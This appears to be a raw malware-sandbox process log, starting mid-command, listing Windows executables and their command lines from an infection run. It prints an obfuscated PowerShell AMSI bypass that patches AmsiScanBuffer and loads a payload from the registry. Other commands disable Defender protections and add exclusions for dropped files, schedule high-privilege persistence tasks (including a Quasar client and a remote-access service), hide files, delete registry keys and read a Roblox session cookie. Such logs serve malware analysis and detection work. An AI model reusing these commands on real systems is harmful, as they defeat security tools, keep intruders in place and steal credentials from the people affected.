@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PNhUhOubGQt=$nlvkduqkZTZcW.GetMethod(''+'G'+'etM'+[Char](111)+'du'+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+[Char](108)+'')));$EPAqehSgElyedt=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$nzQbtsGqlAJGwXnHA=$bgERocHrCpJknq.Invoke($Null,@([Object]$PNhUhOubGQt,[Object]('Vir'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+'e'+'c'+'t'+'')));$fsdzaNt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EPAqehSgElyedt,$DTpbqLEALYnZDkiwoQJ).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$QoEpoKCnSzvHdWsxV=$bgERocHrCpJknq.Invoke($Null,@([Object]$fsdzaNt,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+'ff'+'e'+'r')));$tMmAECOwaM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,4,[ref]$tMmAECOwaM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QoEpoKCnSzvHdWsxV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nzQbtsGqlAJGwXnHA,$ZGluQFTyjlPvCkISWArwNu).Invoke($QoEpoKCnSzvHdWsxV,[uint32]8,0x20,[ref]$tMmAECOwaM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'r'+'ut'+[Char](115)+'s'+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a5fe6155-dd2c-4481-8307-6c530f1c484b}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cbKEIYxfLOuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zkkByHJHlOEUfI,[Parameter(Position=1)][Type]$jNXhuSJyuE)$kuXhIwXmRtq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+[Char](97)+'ss,P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,'+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+'o'+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$kuXhIwXmRtq.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](80)+'ublic',[Reflection.CallingConventions]::Standard,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Ma'+'n'+'age'+[Char](100)+'');$kuXhIwXmRtq.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'Sig'+[Char](44)+''+[Char](78)+''+'e'+'wS'+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+''+[Char](108)+'',$jNXhuSJyuE,$zkkByHJHlOEUfI).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+[Char](100)+'');Write-Output $kuXhIwXmRtq.CreateType();}$TowgBpqykWRdH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$gZEYvIJFLLvQLY=$TowgBpqykWRdH.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c,S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aIHWGzmkcfbXwgMKaID=cbKEIYxfLOuZ @([String])([IntPtr]);$MbJXigrefTaFlOHFefPhpV=cbKEIYxfLOuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QlXnRBRAGji=$TowgBpqykWRdH.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+'l'+'32'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$MdhHeMtBjRszmk=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$XUXWoQgqYfzJkHLAq=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$QlXnRBRAGji,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$Aoekwpv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MdhHeMtBjRszmk,$aIHWGzmkcfbXwgMKaID).Invoke('a'+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$ywzeyZnIMfSbWqxrx=$gZEYvIJFLLvQLY.Invoke($Null,@([Object]$Aoekwpv,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$fcObEGUKYy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,4,[ref]$fcObEGUKYy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ywzeyZnIMfSbWqxrx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XUXWoQgqYfzJkHLAq,$MbJXigrefTaFlOHFefPhpV).Invoke($ywzeyZnIMfSbWqxrx,[uint32]8,0x20,[ref]$fcObEGUKYy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1324 -s 320
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 3520 -ip 3520
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3520 -s 2180
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2324 -ip 2324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1200
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bbdceaac-ed42-4d86-a1df-4449fb89d1a3}
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7D5ABB851EBB1EA598FA427462D75E36
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4820 -ip 4820
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp" /SL5="$E01EA,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JpsXGIQt8bGP.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DbsVCvDMFD4m.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5128 -ip 5128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1324
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
